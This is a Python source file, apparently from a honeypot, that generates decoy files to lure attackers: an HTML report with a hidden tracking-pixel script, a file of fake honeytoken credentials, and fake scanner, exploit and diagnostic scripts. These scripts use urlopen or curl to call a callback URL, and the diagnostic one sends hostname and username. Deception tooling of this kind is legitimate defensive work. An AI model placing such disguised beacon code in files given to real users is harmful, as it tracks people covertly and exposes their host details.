"""
Malicious file payload generator.

Creates files with embedded beacons/callbacks for counter-control.
When attackers download and execute these files, the honeypot
receives callbacks revealing their real environment.
"""

import hashlib
import hmac
from dataclasses import dataclass
from datetime import datetime, timezone

from app.core.config import get_settings

settings = get_settings()


@dataclass(slots=True)
class PayloadSpec:
    payload_type: str
    filename: str
    mime_type: str
    content: bytes
    tracking_id: str
    callback_url: str


def create_tracking_id(session_id: str, payload_type: str) -> str:
    digest = hmac.new(
        settings.secret_key.encode("utf-8"),
        f"{session_id}:{payload_type}:{datetime.now(timezone.utc).timestamp()}".encode("utf-8"),
        hashlib.sha256,
    ).hexdigest()[:16]
    return digest


def build_callback_url(tracking_id: str) -> str:
    host = settings.payload_callback_host or f"http://{settings.host}:{settings.port}"
    return f"{host}/recon/callback/{tracking_id}"


def generate_html_beacon(
    session_id: str,
    source_ip: str = "",
    tracking_id: str | None = None,
) -> PayloadSpec:
    tid = tracking_id or create_tracking_id(session_id, "html_beacon")
    cb_url = build_callback_url(tid)

    html = f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Audit Report</title>
<style>
body{{font-family:Arial,sans-serif;max-width:800px;margin:40px auto;padding:20px;color:#333}}
h1{{color:#c00;border-bottom:2px solid #c00}}
pre{{background:#f5f5f5;padding:12px;font-size:12px;overflow:auto}}
</style>
</head>
<body>
<h1>Internal Security Audit - Confidential</h1>
<p>Audit ID: <code>{tid}</code></p>
<p>Generated: {datetime.now(timezone.utc).isoformat()}</p>
<h2>Findings</h2>
<pre>
[CRITICAL] CVE-2024-1234 - Remote Code Execution in admin panel
[CRITICAL] CVE-2024-5678 - SQL Injection in /api/v2/users
[HIGH]    Default credentials detected on 3 services
[MEDIUM]  Outdated OpenSSL 1.1.1 on internal proxy
</pre>
<p><em>This report is automatically generated and monitored.</em></p>
<script>(function(){{
var i=new Image();
i.src="{cb_url}?ts="+Date.now()+"&ref="+encodeURIComponent(document.referrer||"direct");
}})();</script>
</body>
</html>"""
    return PayloadSpec(
        payload_type="html_beacon",
        filename="security_audit_report.html",
        mime_type="text/html",
        content=html.encode("utf-8"),
        tracking_id=tid,
        callback_url=cb_url,
    )


def generate_credentials_file(
    session_id: str,
    source_ip: str = "",
    tracking_id: str | None = None,
) -> PayloadSpec:
    tid = tracking_id or create_tracking_id(session_id, "credentials")
    cb_url = build_callback_url(tid)

    content = f"""# Internal Credentials - CONFIDENTIAL
# Auto-generated by security scanner
# Report ID: {tid}

[Database - Production]
host=db-prod.internal
port=5432
user=admin
password=ProdDb#2024!

[Database - Staging]
host=db-staging.internal
port=5432
user=readonly
password=Staging#Read0nly

[SSH - Bastion]
host=bastion.internal
port=22
user=deploy
password=Bastion@Deploy#2024

[AWS API Credentials]
access_key=AKIA{hashlib.md5(tid.encode()).hexdigest()[:16].upper()}
secret_key={hashlib.sha256(tid.encode()).hexdigest()[:40]}

# Callback: {cb_url}
# All credentials are honeytokens - access is monitored
"""
    return PayloadSpec(
        payload_type="credentials",
        filename="internal_credentials.txt",
        mime_type="text/plain",
        content=content.encode("utf-8"),
        tracking_id=tid,
        callback_url=cb_url,
    )


def generate_fake_tool(
    session_id: str,
    tool_type: str = "scanner",
    tracking_id: str | None = None,
) -> PayloadSpec:
    tid = tracking_id or create_tracking_id(session_id, tool_type)
    cb_url = build_callback_url(tid)

    if tool_type == "scanner":
        filename = "vuln_scanner.py"
        content = f'''#!/usr/bin/env python3
"""Internal vulnerability scanner - CONFIDENTIAL"""
import json
import sys
try:
    from urllib.request import urlopen
except ImportError:
    from urllib2 import urlopen

TRACKING_ID = "{tid}"
CALLBACK = "{cb_url}"

def scan_target(target_url):
    """Scan target for known vulnerabilities."""
    print(f"[*] Scanning {{target_url}}...")
    print("[!] CVE-2024-1234 detected - RCE in admin panel")
    print("[!] CVE-2024-5678 detected - SQL Injection")
    print("[*] Reporting to central server...")
    try:
        urlopen(CALLBACK + "?action=scan_complete&target=" + target_url, timeout=5)
    except Exception:
        pass
    print("[+] Scan complete. Report uploaded.")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    scan_target(target)
'''
    elif tool_type == "exploit":
        filename = "exploit_check.sh"
        content = f'''#!/bin/bash
# Internal exploit verification script
# TRACKING: {tid}

echo "[*] Checking for CVE-2024-1234..."
sleep 1
echo "[!] Target appears vulnerable!"

curl -s -o /dev/null "{cb_url}?action=exploit_run&status=vulnerable"

echo "[*] Exploit verification complete."
echo "[*] Results transmitted to C2."
'''
    else:
        filename = "diagnostic.sh"
        content = f'''#!/bin/bash
# System diagnostic script
# TRACKING_ID: {tid}
echo "Hostname: $(hostname)"
echo "OS: $(uname -a)"
echo "User: $(whoami)"
echo "IP: $(curl -s ifconfig.me 2>/dev/null || echo 'unknown')"
curl -s -o /dev/null "{cb_url}?action=diag_complete&host=$(hostname)&user=$(whoami)"
'''

    return PayloadSpec(
        payload_type=tool_type,
        filename=filename,
        mime_type="application/octet-stream",
        content=content.encode("utf-8"),
        tracking_id=tid,
        callback_url=cb_url,
    )


PAYLOAD_GENERATORS = {
    "html_beacon": generate_html_beacon,
    "credentials": generate_credentials_file,
    "scanner": lambda sid, **kw: generate_fake_tool(sid, "scanner"),
    "exploit": lambda sid, **kw: generate_fake_tool(sid, "exploit"),
    "diagnostic": lambda sid, **kw: generate_fake_tool(sid, "diagnostic"),
}
